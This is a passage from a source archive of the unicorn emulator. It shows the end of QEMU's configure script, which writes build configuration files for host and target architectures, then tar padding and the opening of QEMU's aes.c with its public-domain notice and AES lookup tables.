echo "libdir=$libdir" >> $config_host_mak echo "libexecdir=$libexecdir" >> $config_host_mak echo "includedir=$includedir" >> $config_host_mak echo "sysconfdir=$sysconfdir" >> $config_host_mak echo "qemu_confdir=$qemu_confdir" >> $config_host_mak if test "$mingw32" = "no" ; then echo "qemu_localstatedir=$local_statedir" >> $config_host_mak fi echo "qemu_helperdir=$libexecdir" >> $config_host_mak echo "qemu_localedir=$qemu_localedir" >> $config_host_mak echo "libs_cpu=$libs_cpu" >> $config_host_mak echo "libs_softmmu=$libs_softmmu" >> $config_host_mak echo "GIT=$git" >> $config_host_mak echo "GIT_SUBMODULES=$git_submodules" >> $config_host_mak echo "GIT_UPDATE=$git_update" >> $config_host_mak echo "ARCH=$ARCH" >> $config_host_mak if test "$strip_opt" = "yes" ; then echo "STRIP=${strip}" >> $config_host_mak fi if test "$bigendian" = "yes" ; then echo "HOST_WORDS_BIGENDIAN=y" >> $config_host_mak fi if test "$mingw32" = "yes" ; then echo "CONFIG_WIN32=y" >> $config_host_mak rc_version=$(cat $source_path/VERSION) version_major=${rc_version%%.*} rc_version=${rc_version#*.} version_minor=${rc_version%%.*} rc_version=${rc_version#*.} version_subminor=${rc_version%%.*} version_micro=0 echo "CONFIG_FILEVERSION=$version_major,$version_minor,$version_subminor,$version_micro" >> $config_host_mak echo "CONFIG_PRODUCTVERSION=$version_major,$version_minor,$version_subminor,$version_micro" >> $config_host_mak else echo "CONFIG_POSIX=y" >> $config_host_mak fi if test "$linux" = "yes" ; then echo "CONFIG_LINUX=y" >> $config_host_mak fi if test "$darwin" = "yes" ; then echo "CONFIG_DARWIN=y" >> $config_host_mak fi if test "$solaris" = "yes" ; then echo "CONFIG_SOLARIS=y" >> $config_host_mak fi if test "$haiku" = "yes" ; then echo "CONFIG_HAIKU=y" >> $config_host_mak fi if test "$static" = "yes" ; then echo "CONFIG_STATIC=y" >> $config_host_mak fi qemu_version=$(head $source_path/VERSION) echo "VERSION=$qemu_version" >>$config_host_mak echo "PKGVERSION=$pkgversion" >>$config_host_mak echo "SRC_PATH=$source_path" >> $config_host_mak echo "TARGET_DIRS=$target_list" >> $config_host_mak if test "$sync_file_range" = "yes" ; then echo "CONFIG_SYNC_FILE_RANGE=y" >> $config_host_mak fi if test "$dup3" = "yes" ; then echo "CONFIG_DUP3=y" >> $config_host_mak fi if test "$prctl_pr_set_timerslack" = "yes" ; then echo "CONFIG_PRCTL_PR_SET_TIMERSLACK=y" >> $config_host_mak fi if test "$epoll" = "yes" ; then echo "CONFIG_EPOLL=y" >> $config_host_mak fi if test "$clock_adjtime" = "yes" ; then echo "CONFIG_CLOCK_ADJTIME=y" >> $config_host_mak fi if test "$syncfs" = "yes" ; then echo "CONFIG_SYNCFS=y" >> $config_host_mak fi if test "$sem_timedwait" = "yes" ; then echo "CONFIG_SEM_TIMEDWAIT=y" >> $config_host_mak fi if test "$strchrnul" = "yes" ; then echo "HAVE_STRCHRNUL=y" >> $config_host_mak fi if test "$st_atim" = "yes" ; then echo "HAVE_STRUCT_STAT_ST_ATIM=y" >> $config_host_mak fi if test "$byteswap_h" = "yes" ; then echo "CONFIG_BYTESWAP_H=y" >> $config_host_mak fi if test "$bswap_h" = "yes" ; then echo "CONFIG_MACHINE_BSWAP_H=y" >> $config_host_mak fi if test "$have_broken_size_max" = "yes" ; then echo "HAVE_BROKEN_SIZE_MAX=y" >> $config_host_mak fi if test "$membarrier" = "yes" ; then echo "CONFIG_MEMBARRIER=y" >> $config_host_mak fi if test "$signalfd" = "yes" ; then echo "CONFIG_SIGNALFD=y" >> $config_host_mak fi if test "$tcg" = "yes"; then echo "CONFIG_TCG=y" >> $config_host_mak fi if test "$madvise" = "yes" ; then echo "CONFIG_MADVISE=y" >> $config_host_mak fi if test "$posix_madvise" = "yes" ; then echo "CONFIG_POSIX_MADVISE=y" >> $config_host_mak fi if test "$posix_memalign" = "yes" ; then echo "CONFIG_POSIX_MEMALIGN=y" >> $config_host_mak fi if test "$malloc_trim" = "yes" ; then echo "CONFIG_MALLOC_TRIM=y" >> $config_host_mak fi if test "$avx2_opt" = "yes" ; then echo "CONFIG_AVX2_OPT=y" >> $config_host_mak fi if test "$avx512f_opt" = "yes" ; then echo "CONFIG_AVX512F_OPT=y" >> $config_host_mak fi # XXX: suppress that if [ "$bsd" = "yes" ] ; then echo "CONFIG_BSD=y" >> $config_host_mak fi if test "$debug_stack_usage" = "yes" ; then echo "CONFIG_DEBUG_STACK_USAGE=y" >> $config_host_mak fi if test "$open_by_handle_at" = "yes" ; then echo "CONFIG_OPEN_BY_HANDLE=y" >> $config_host_mak fi if test "$linux_magic_h" = "yes" ; then echo "CONFIG_LINUX_MAGIC_H=y" >> $config_host_mak fi if test "$pragma_diagnostic_available" = "yes" ; then echo "CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE=y" >> $config_host_mak fi if test "$have_asan_iface_fiber" = "yes" ; then echo "CONFIG_ASAN_IFACE_FIBER=y" >> $config_host_mak fi if test "$has_environ" = "yes" ; then echo "CONFIG_HAS_ENVIRON=y" >> $config_host_mak fi if test "$cpuid_h" = "yes" ; then echo "CONFIG_CPUID_H=y" >> $config_host_mak fi if test "$int128" = "yes" ; then echo "CONFIG_INT128=y" >> $config_host_mak fi if test "$atomic128" = "yes" ; then echo "CONFIG_ATOMIC128=y" >> $config_host_mak fi if test "$cmpxchg128" = "yes" ; then echo "CONFIG_CMPXCHG128=y" >> $config_host_mak fi if test "$atomic64" = "yes" ; then echo "CONFIG_ATOMIC64=y" >> $config_host_mak fi if test "$attralias" = "yes" ; then echo "CONFIG_ATTRIBUTE_ALIAS=y" >> $config_host_mak fi if test "$getauxval" = "yes" ; then echo "CONFIG_GETAUXVAL=y" >> $config_host_mak fi if test "$have_sysmacros" = "yes" ; then echo "CONFIG_SYSMACROS=y" >> $config_host_mak fi if test "$have_static_assert" = "yes" ; then echo "CONFIG_STATIC_ASSERT=y" >> $config_host_mak fi if test "$have_utmpx" = "yes" ; then echo "HAVE_UTMPX=y" >> $config_host_mak fi if test "$have_getrandom" = "yes" ; then echo "CONFIG_GETRANDOM=y" >> $config_host_mak fi if test "$have_pthread_jit_protect" = "yes" ; then echo "HAVE_PTHREAD_JIT_PROTECT=y" >> $config_host_mak fi if test "$have_sprr" = "yes" ; then echo "HAVE_SPRR=y" >> $config_host_mak fi # Hold two types of flag: # CONFIG_THREAD_SETNAME_BYTHREAD - we've got a way of setting the name on # a thread we have a handle to # CONFIG_PTHREAD_SETNAME_NP_W_TID - A way of doing it on a particular # platform if test "$pthread_setname_np_w_tid" = "yes" ; then echo "CONFIG_THREAD_SETNAME_BYTHREAD=y" >> $config_host_mak echo "CONFIG_PTHREAD_SETNAME_NP_W_TID=y" >> $config_host_mak elif test "$pthread_setname_np_wo_tid" = "yes" ; then echo "CONFIG_THREAD_SETNAME_BYTHREAD=y" >> $config_host_mak echo "CONFIG_PTHREAD_SETNAME_NP_WO_TID=y" >> $config_host_mak fi if test "$ARCH" = "sparc64" ; then QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/sparc $QEMU_INCLUDES" elif test "$ARCH" = "s390x" ; then QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/s390 $QEMU_INCLUDES" elif test "$ARCH" = "x86_64" || test "$ARCH" = "x32" ; then QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/i386 $QEMU_INCLUDES" elif test "$ARCH" = "ppc64" ; then QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/ppc $QEMU_INCLUDES" elif test "$ARCH" = "riscv32" || test "$ARCH" = "riscv64" ; then QEMU_INCLUDES="-I\$(SRC_PATH)/tcg/riscv $QEMU_INCLUDES" else QEMU_INCLUDES="-iquote \$(SRC_PATH)/tcg/\$(ARCH) $QEMU_INCLUDES" fi echo "TOOLS=$tools" >> $config_host_mak echo "MAKE=$make" >> $config_host_mak echo "INSTALL=$install" >> $config_host_mak echo "INSTALL_DIR=$install -d -m 0755" >> $config_host_mak echo "INSTALL_DATA=$install -c -m 0644" >> $config_host_mak echo "INSTALL_PROG=$install -c -m 0755" >> $config_host_mak echo "INSTALL_LIB=$install -c -m 0644" >> $config_host_mak echo "CC=$cc" >> $config_host_mak if $iasl -h > /dev/null 2>&1; then echo "IASL=$iasl" >> $config_host_mak fi echo "HOST_CC=$host_cc" >> $config_host_mak echo "CXX=$cxx" >> $config_host_mak echo "OBJCC=$objcc" >> $config_host_mak echo "AR=$ar" >> $config_host_mak echo "ARFLAGS=$ARFLAGS" >> $config_host_mak echo "AS=$as" >> $config_host_mak echo "CCAS=$ccas" >> $config_host_mak echo "CPP=$cpp" >> $config_host_mak echo "OBJCOPY=$objcopy" >> $config_host_mak echo "LD=$ld" >> $config_host_mak echo "RANLIB=$ranlib" >> $config_host_mak echo "NM=$nm" >> $config_host_mak echo "PKG_CONFIG=$pkg_config_exe" >> $config_host_mak echo "CFLAGS=$CFLAGS" >> $config_host_mak echo "CFLAGS_NOPIE=$CFLAGS_NOPIE" >> $config_host_mak echo "QEMU_CFLAGS=$QEMU_CFLAGS" >> $config_host_mak echo "QEMU_CXXFLAGS=$QEMU_CXXFLAGS" >> $config_host_mak echo "QEMU_INCLUDES=$QEMU_INCLUDES" >> $config_host_mak echo "QEMU_LDFLAGS=$QEMU_LDFLAGS" >> $config_host_mak echo "LDFLAGS_NOPIE=$LDFLAGS_NOPIE" >> $config_host_mak echo "LD_REL_FLAGS=$LD_REL_FLAGS" >> $config_host_mak echo "LD_I386_EMULATION=$ld_i386_emulation" >> $config_host_mak echo "LIBS+=$LIBS" >> $config_host_mak echo "LIBS_TOOLS+=$libs_tools" >> $config_host_mak echo "PTHREAD_LIB=$PTHREAD_LIB" >> $config_host_mak echo "EXESUF=$EXESUF" >> $config_host_mak echo "DSOSUF=$DSOSUF" >> $config_host_mak echo "LDFLAGS_SHARED=$LDFLAGS_SHARED" >> $config_host_mak for target in $target_list; do target_dir="$target" config_target_mak=$target_dir/config-target.mak target_name=$(echo $target | cut -d '-' -f 1) target_aligned_only="no" case "$target_name" in alpha|hppa|mips64el|mips64|mipsel|mips|mipsn32|mipsn32el|sh4|sh4eb|sparc|sparc64|sparc32plus|xtensa|xtensaeb) target_aligned_only="yes" ;; esac target_bigendian="no" case "$target_name" in hppa|lm32|m68k|microblaze|mips|mipsn32|mips64|moxie|or1k|ppc|ppc64|ppc64abi32|s390x|sh4eb|sparc|sparc64|sparc32plus|xtensaeb) target_bigendian="yes" ;; esac target_user_only="no" target_linux_user="no" target_bsd_user="no" target_softmmu="yes" mkdir -p $target_dir echo "# Automatically generated by configure - do not modify" > $config_target_mak mttcg="no" TARGET_ARCH="$target_name" TARGET_BASE_ARCH="" TARGET_ABI_DIR="" case "$target_name" in i386) mttcg="yes" TARGET_SYSTBL_ABI=i386 ;; x86_64) TARGET_BASE_ARCH=i386 TARGET_SYSTBL_ABI=common,64 mttcg="yes" ;; alpha) mttcg="yes" TARGET_SYSTBL_ABI=common ;; arm) TARGET_ARCH=arm TARGET_SYSTBL_ABI=common,oabi mttcg="yes" ;; aarch64) TARGET_ARCH=aarch64 TARGET_BASE_ARCH=arm mttcg="yes" ;; cris) ;; hppa) mttcg="yes" TARGET_SYSTBL_ABI=common,32 ;; lm32) ;; m68k) TARGET_SYSTBL_ABI=common ;; microblaze|microblazeel) TARGET_ARCH=microblaze TARGET_SYSTBL_ABI=common echo "TARGET_ABI32=y" >> $config_target_mak ;; mips|mipsel) mttcg="yes" TARGET_ARCH=mips echo "TARGET_ABI_MIPSO32=y" >> $config_target_mak TARGET_SYSTBL_ABI=o32 ;; mipsn32|mipsn32el) mttcg="yes" TARGET_ARCH=mips64 TARGET_BASE_ARCH=mips echo "TARGET_ABI_MIPSN32=y" >> $config_target_mak echo "TARGET_ABI32=y" >> $config_target_mak TARGET_SYSTBL_ABI=n32 ;; mips64|mips64el) mttcg="no" TARGET_ARCH=mips64 TARGET_BASE_ARCH=mips echo "TARGET_ABI_MIPSN64=y" >> $config_target_mak TARGET_SYSTBL_ABI=n64 ;; moxie) ;; nios2) ;; or1k) TARGET_ARCH=openrisc TARGET_BASE_ARCH=openrisc ;; ppc) TARGET_SYSTBL_ABI=common,nospu,32 ;; ppc64) TARGET_BASE_ARCH=ppc TARGET_ABI_DIR=ppc TARGET_SYSTBL_ABI=common,nospu,64 mttcg=yes ;; ppc64le) TARGET_ARCH=ppc64 TARGET_BASE_ARCH=ppc TARGET_ABI_DIR=ppc TARGET_SYSTBL_ABI=common,nospu,64 mttcg=yes ;; ppc64abi32) TARGET_ARCH=ppc64 TARGET_BASE_ARCH=ppc TARGET_ABI_DIR=ppc TARGET_SYSTBL_ABI=common,nospu,32 echo "TARGET_ABI32=y" >> $config_target_mak ;; riscv32) TARGET_BASE_ARCH=riscv TARGET_ABI_DIR=riscv mttcg=yes ;; riscv64) TARGET_BASE_ARCH=riscv TARGET_ABI_DIR=riscv mttcg=yes ;; rx) TARGET_ARCH=rx target_compiler=$cross_cc_rx ;; sh4|sh4eb) TARGET_ARCH=sh4 TARGET_SYSTBL_ABI=common ;; sparc) TARGET_SYSTBL_ABI=common,32 ;; sparc64) TARGET_BASE_ARCH=sparc TARGET_SYSTBL_ABI=common,64 ;; sparc32plus) TARGET_ARCH=sparc64 TARGET_BASE_ARCH=sparc TARGET_ABI_DIR=sparc TARGET_SYSTBL_ABI=common,32 echo "TARGET_ABI32=y" >> $config_target_mak ;; s390x) TARGET_SYSTBL_ABI=common,64 mttcg=yes ;; tilegx) ;; tricore) TARGET_ARCH=tricore TARGET_BASE_ARCH=tricore ;; unicore32) ;; xtensa|xtensaeb) TARGET_ARCH=xtensa TARGET_SYSTBL_ABI=common mttcg="yes" ;; *) error_exit "Unsupported target CPU" ;; esac # TARGET_BASE_ARCH needs to be defined after TARGET_ARCH if [ "$TARGET_BASE_ARCH" = "" ]; then TARGET_BASE_ARCH=$TARGET_ARCH fi #symlink "$source_path/Makefile.target" "$target_dir/Makefile" upper() { echo "$@"| LC_ALL=C tr '[a-z]' '[A-Z]' } target_arch_name="$(upper $TARGET_ARCH)" echo "TARGET_$target_arch_name=y" >> $config_target_mak echo "TARGET_NAME=$target_name" >> $config_target_mak echo "TARGET_BASE_ARCH=$TARGET_BASE_ARCH" >> $config_target_mak if [ "$TARGET_ABI_DIR" = "" ]; then TARGET_ABI_DIR=$TARGET_ARCH fi echo "TARGET_ABI_DIR=$TARGET_ABI_DIR" >> $config_target_mak if [ "$HOST_VARIANT_DIR" != "" ]; then echo "HOST_VARIANT_DIR=$HOST_VARIANT_DIR" >> $config_target_mak fi if [ "$TARGET_SYSTBL_ABI" != "" ]; then echo "TARGET_SYSTBL_ABI=$TARGET_SYSTBL_ABI" >> $config_target_mak fi if test "$target_aligned_only" = "yes" ; then echo "TARGET_ALIGNED_ONLY=y" >> $config_target_mak fi if test "$target_bigendian" = "yes" ; then echo "TARGET_WORDS_BIGENDIAN=y" >> $config_target_mak fi if test "$target_softmmu" = "yes" ; then echo "CONFIG_SOFTMMU=y" >> $config_target_mak if test "$mttcg" = "yes" ; then echo "TARGET_SUPPORTS_MTTCG=y" >> $config_target_mak fi fi if test "$target_user_only" = "yes" ; then echo "CONFIG_USER_ONLY=y" >> $config_target_mak fi if test "$target_linux_user" = "yes" ; then echo "CONFIG_LINUX_USER=y" >> $config_target_mak fi if test "$target_bsd_user" = "yes" ; then echo "CONFIG_BSD_USER=y" >> $config_target_mak fi # generate QEMU_CFLAGS/QEMU_LDFLAGS for targets cflags="" ldflags="" case "$ARCH" in alpha) # Ensure there's only a single GP cflags="-msmall-data $cflags" ;; esac echo "QEMU_LDFLAGS+=$ldflags" >> $config_target_mak echo "QEMU_CFLAGS+=$cflags" >> $config_target_mak done # for target in $targets if test "$ccache_cpp2" = "yes"; then echo "export CCACHE_CPP2=y" >> $config_host_mak fi # Save the configure command line for later reuse. cat <<EOD >config.status #!/bin/sh # Generated by configure. # Run this file to recreate the current configuration. # Compiler output produced by configure, useful for debugging # configure, is in config.log if it exists. EOD preserve_env() { envname=$1 eval envval=\$$envname if test -n "$envval" then echo "$envname='$envval'" >> config.status echo "export $envname" >> config.status else echo "unset $envname" >> config.status fi } # Preserve various env variables that influence what # features/build target configure will detect preserve_env AR preserve_env AS preserve_env CC preserve_env CPP preserve_env CXX preserve_env INSTALL preserve_env LD preserve_env LD_LIBRARY_PATH preserve_env LIBTOOL preserve_env MAKE preserve_env NM preserve_env OBJCOPY preserve_env PATH preserve_env PKG_CONFIG preserve_env PKG_CONFIG_LIBDIR preserve_env PKG_CONFIG_PATH preserve_env STRIP printf "exec" >>config.status printf " '%s'" "$0" "$@" >>config.status echo ' "$@"' >>config.status chmod +x config.status rm -r "$TMPDIR1" �����������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/crypto/��������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015473�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/crypto/aes.c���������������������������������������������������������������������0000664�0000000�0000000�00000255115�14675241067�0016420�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/** * * aes.c - integrated in QEMU by Fabrice Bellard from the OpenSSL project. */ /* * rijndael-alg-fst.c * * @version 3.0 (December 2000) * * Optimised ANSI C code for the Rijndael cipher (now AES) * * @author Vincent Rijmen <vincent.rijmen@esat.kuleuven.ac.be> * @author Antoon Bosselaers <antoon.bosselaers@esat.kuleuven.ac.be> * @author Paulo Barreto <paulo.barreto@terra.com.br> * * This code is hereby placed in the public domain. * * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "qemu/osdep.h" #include "crypto/aes.h" typedef uint32_t u32; typedef uint8_t u8; /* This controls loop-unrolling in aes_core.c */ #undef FULL_UNROLL # define GETU32(pt) (((u32)(pt)[0] << 24) ^ ((u32)(pt)[1] << 16) ^ ((u32)(pt)[2] << 8) ^ ((u32)(pt)[3])) # define PUTU32(ct, st) { (ct)[0] = (u8)((st) >> 24); (ct)[1] = (u8)((st) >> 16); (ct)[2] = (u8)((st) >> 8); (ct)[3] = (u8)(st); } const uint8_t AES_sbox[256] = { 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, }; const uint8_t AES_isbox[256] = { 0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB, 0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB, 0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E, 0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25, 0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92, 0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84, 0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06, 0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B, 0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73, 0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E, 0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4, 0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F, 0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF, 0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D, }; const uint8_t AES_shifts[16] = { 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11 }; const uint8_t AES_ishifts[16] = { 0, 13, 10, 7, 4, 1, 14, 11, 8, 5, 2, 15, 12, 9, 6, 3 }; /* AES_imc[x][0] = [x].[0e, 09, 0d, 0b]; */ /* AES_imc[x][1] = [x].[0b, 0e, 09, 0d]; */ /* AES_imc[x][2] = [x].[0d, 0b, 0e, 09]; */ /* AES_imc[x][3] = [x].[09, 0d, 0b, 0e]; */ const uint32_t AES_imc[256][4] = { { 0x00000000, 0x00000000, 0x00000000, 0x00000000, }, /* x=00 */ { 0x0E090D0B, 0x0B0E090D, 0x0D0B0E09, 0x090D0B0E, }, /* x=01 */ { 0x1C121A16, 0x161C121A, 0x1A161C12, 0x121A161C, }, /* x=02 */ { 0x121B171D, 0x1D121B17, 0x171D121B, 0x1B171D12, }, /* x=03 */ { 0x3824342C, 0x2C382434, 0x342C3824, 0x24342C38, }, /* x=04 */ { 0x362D3927, 0x27362D39, 0x3927362D, 0x2D392736, }, /* x=05 */ { 0x24362E3A, 0x3A24362E, 0x2E3A2436, 0x362E3A24, }, /* x=06 */ { 0x2A3F2331, 0x312A3F23, 0x23312A3F, 0x3F23312A, }, /* x=07 */ { 0x70486858, 0x58704868, 0x68587048, 0x48685870, }, /* x=08 */ { 0x7E416553, 0x537E4165, 0x65537E41, 0x4165537E, }, /* x=09 */ { 0x6C5A724E, 0x4E6C5A72, 0x724E6C5A, 0x5A724E6C, }, /* x=0A */ { 0x62537F45, 0x4562537F, 0x7F456253, 0x537F4562, }, /* x=0B */ { 0x486C5C74, 0x74486C5C, 0x5C74486C, 0x6C5C7448, }, /* x=0C */ { 0x4665517F, 0x7F466551, 0x517F4665, 0x65517F46, }, /* x=0D */ { 0x547E4662, 0x62547E46, 0x4662547E, 0x7E466254, }, /* x=0E */ { 0x5A774B69, 0x695A774B, 0x4B695A77, 0x774B695A, }, /* x=0F */ { 0xE090D0B0, 0xB0E090D0, 0xD0B0E090, 0x90D0B0E0, }, /* x=10 */ { 0xEE99DDBB, 0xBBEE99DD, 0xDDBBEE99, 0x99DDBBEE, }, /* x=11 */ { 0xFC82CAA6, 0xA6FC82CA, 0xCAA6FC82, 0x82CAA6FC, }, /* x=12 */ { 0xF28BC7AD, 0xADF28BC7, 0xC7ADF28B, 0x8BC7ADF2, }, /* x=13 */ { 0xD8B4E49C, 0x9CD8B4E4, 0xE49CD8B4, 0xB4E49CD8, }, /* x=14 */ { 0xD6BDE997, 0x97D6BDE9, 0xE997D6BD, 0xBDE997D6, }, /* x=15 */ { 0xC4A6FE8A, 0x8AC4A6FE, 0xFE8AC4A6, 0xA6FE8AC4, }, /* x=16 */ { 0xCAAFF381, 0x81CAAFF3, 0xF381CAAF, 0xAFF381CA, }, /* x=17 */ { 0x90D8B8E8, 0xE890D8B8, 0xB8E890D8, 0xD8B8E890, }, /* x=18 */ { 0x9ED1B5E3, 0xE39ED1B5, 0xB5E39ED1, 0xD1B5E39E, }, /* x=19 */ { 0x8CCAA2FE, 0xFE8CCAA2, 0xA2FE8CCA, 0xCAA2FE8C, }, /* x=1A */ { 0x82C3AFF5, 0xF582C3AF, 0xAFF582C3, 0xC3AFF582, }, /* x=1B */ { 0xA8FC8CC4, 0xC4A8FC8C, 0x8CC4A8FC, 0xFC8CC4A8, }, /* x=1C */ { 0xA6F581CF, 0xCFA6F581, 0x81CFA6F5, 0xF581CFA6, }, /* x=1D */ { 0xB4EE96D2, 0xD2B4EE96, 0x96D2B4EE, 0xEE96D2B4, }, /* x=1E */ { 0xBAE79BD9, 0xD9BAE79B, 0x9BD9BAE7, 0xE79BD9BA, }, /* x=1F */ { 0xDB3BBB7B, 0x7BDB3BBB, 0xBB7BDB3B, 0x3BBB7BDB, }, /* x=20 */ { 0xD532B670, 0x70D532B6, 0xB670D532, 0x32B670D5, }, /* x=21 */ { 0xC729A16D, 0x6DC729A1, 0xA16DC729, 0x29A16DC7, }, /* x=22 */ { 0xC920AC66, 0x66C920AC, 0xAC66C920, 0x20AC66C9, }, /* x=23 */ { 0xE31F8F57, 0x57E31F8F, 0x8F57E31F, 0x1F8F57E3, }, /* x=24 */ { 0xED16825C, 0x5CED1682, 0x825CED16, 0x16825CED, }, /* x=25 */ { 0xFF0D9541, 0x41FF0D95, 0x9541FF0D, 0x0D9541FF, }, /* x=26 */ { 0xF104984A, 0x4AF10498, 0x984AF104, 0x04984AF1, }, /* x=27 */ { 0xAB73D323, 0x23AB73D3, 0xD323AB73, 0x73D323AB, }, /* x=28 */ { 0xA57ADE28, 0x28A57ADE, 0xDE28A57A, 0x7ADE28A5, }, /* x=29 */ { 